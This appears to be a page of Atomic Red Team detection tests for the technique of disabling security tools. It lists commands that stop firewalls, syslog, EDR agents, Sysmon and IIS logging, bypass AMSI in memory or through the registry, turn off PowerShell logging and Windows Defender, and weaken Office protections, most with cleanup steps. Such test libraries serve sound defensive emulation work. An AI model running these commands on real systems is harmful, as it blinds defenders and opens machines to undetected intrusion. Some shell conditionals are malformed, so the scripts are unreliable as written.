Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security scanning or event reporting.
-
Atomic Test #12 - AMSI Bypass - Remove AMSI Provider Reg Key
-
Atomic Test #13 - Disable Arbitrary Security Windows Service
-
Atomic Test #15 - PowerShell Bypass of AntiMalware Scripting Interface
-
Atomic Test #16 - Tamper with Windows Defender ATP PowerShell
-
Atomic Test #17 - Tamper with Windows Defender Command Prompt
Disables the iptables firewall
Supported Platforms: Linux
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
then
service iptables stop
chkconfig off iptables
service ip6tables stop
chkconfig off ip6tables
else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ];
systemctl stop firewalld
systemctl disable firewalld
fi
Disables syslog collection
Supported Platforms: Linux
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
then
service rsyslog stop
chkconfig off rsyslog
else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ];
systemctl stop rsyslog
systemctl disable rsyslog
fi
Disable the Cb Response service
Supported Platforms: Linux
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
then
service cbdaemon stop
chkconfig off cbdaemon
else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ];
systemctl stop cbdaemon
systemctl disable cbdaemon
fi
Disables SELinux enforcement
Supported Platforms: Linux
setenforce 0
Disables Carbon Black Response
Supported Platforms: macOS
sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist
Disables LittleSnitch
Supported Platforms: macOS
sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
Disables OpenDNS Umbrella
Supported Platforms: macOS
sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service.
Supported Platforms: Windows
Name | Description | Type | Default Value |
---|---|---|---|
sysmon_driver | The name of the Sysmon filter driver (this can change from the default) | string | SysmonDrv |
fltmc.exe unload #{sysmon_driver}
sc stop sysmon
fltmc.exe load #{sysmon_driver}
sc start sysmon
fltmc.exe filters | findstr #{sysmon_driver}
echo Automated installer not implemented yet, please install Sysmon manually
Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union). This action requires HTTP logging configurations in IIS to be unlocked.
Supported Platforms: Windows
Name | Description | Type | Default Value |
---|---|---|---|
website_name | The name of the website on a server | string | Default Web Site |
C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:true
C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false
Uninstall Sysinternals Sysmon for Defense Evasion
Supported Platforms: Windows
Name | Description | Type | Default Value |
---|---|---|---|
sysmon_exe | The location of the Sysmon executable from Sysinternals (ignored if sysmon.exe is found in your PATH) | Path | PathToAtomicsFolder\T1089\bin\sysmon.exe |
sysmon -u
sysmon -i -accepteula
if(cmd /c where sysmon) {exit 0} else {exit 1}
$parentpath = Split-Path "#{sysmon_exe}"; $zippath = "$parentpath\Sysmon.zip"
New-Item -ItemType Directory $parentpath -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$zippath"
Expand-Archive $zippath $parentpath -Force; Remove-Item $zippath
if(-not ($Env:Path).contains($parentpath)){$Env:Path += ";$parentpath"}
if(cmd /c sc query sysmon) { exit 0} else { exit 1}
cmd /c sysmon -i -accepteula
Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true. https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
Supported Platforms: Windows
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false)
With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection. This test removes the Windows Defender provider registry key.
Supported Platforms: Windows
Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse
New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}"
With administrative rights, an adversary can disable Windows Services related to security products.
Supported Platforms: Windows
Name | Description | Type | Default Value |
---|---|---|---|
service_name | The name of the service to stop | String | McAfeeDLPAgentService |
net.exe stop #{service_name}
sc.exe config #{service_name} start= disabled
sc.exe config #{service_name} start= auto
net.exe start #{service_name}
An adversary may disable PowerShell Script Block Logging to avoid leaving evidence.
Credit to Matt Graeber (@mattifestation) for the research.
Supported Platforms: Windows
$GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
$GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0
$GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
$GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 1
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 1
An adversary may bypass Windows Defender AMSI to execute malicious PowerShell code.
Credit to Matt Graeber (@mattifestation) for the research.
Supported Platforms: Windows
[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
Attempting to disable scheduled scanning and other parts of windows defender atp
Supported Platforms: Windows
Set-MpPreference -DisableRealtimeMonitoring 1
Set-MpPreference -DisableBehaviorMonitoring 1
Set-MpPreference -DisableScriptScanning 1
Set-MpPreference -DisableBlockAtFirstSeen 1
Set-MpPreference -DisableRealtimeMonitoring 0
Set-MpPreference -DisableBehaviorMonitoring 0
Set-MpPreference -DisableScriptScanning 0
Set-MpPreference -DisableBlockAtFirstSeen 0
Attempting to disable scheduled scanning and other parts of windows defender atp
Supported Platforms: Windows
sc stop WinDefend
sc config WinDefend start=disabled
sc query WinDefend
sc start WinDefend
sc config WinDefend start=enabled
Disable Windows Defender from starting after a reboot
Supported Platforms: Windows
Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1
Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 0
Gorgon group may disable Office security features so that their code can run https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
Supported Platforms: Windows
New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel"
New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security"
New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "VBAWarnings" -Value "1" -PropertyType "Dword"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableInternetFilesInPV" -Value "1" -PropertyType "Dword"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableUnsafeLocationsInPV" -Value "1" -PropertyType "Dword"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableAttachementsInPV" -Value "1" -PropertyType "Dword"
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "VBAWarnings"
Remove-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView"
Removing definition files would cause ATP to not fire for AntiMalware Check MpCmdRun.exe man page for info on all arguments https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
Supported Platforms: Windows
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All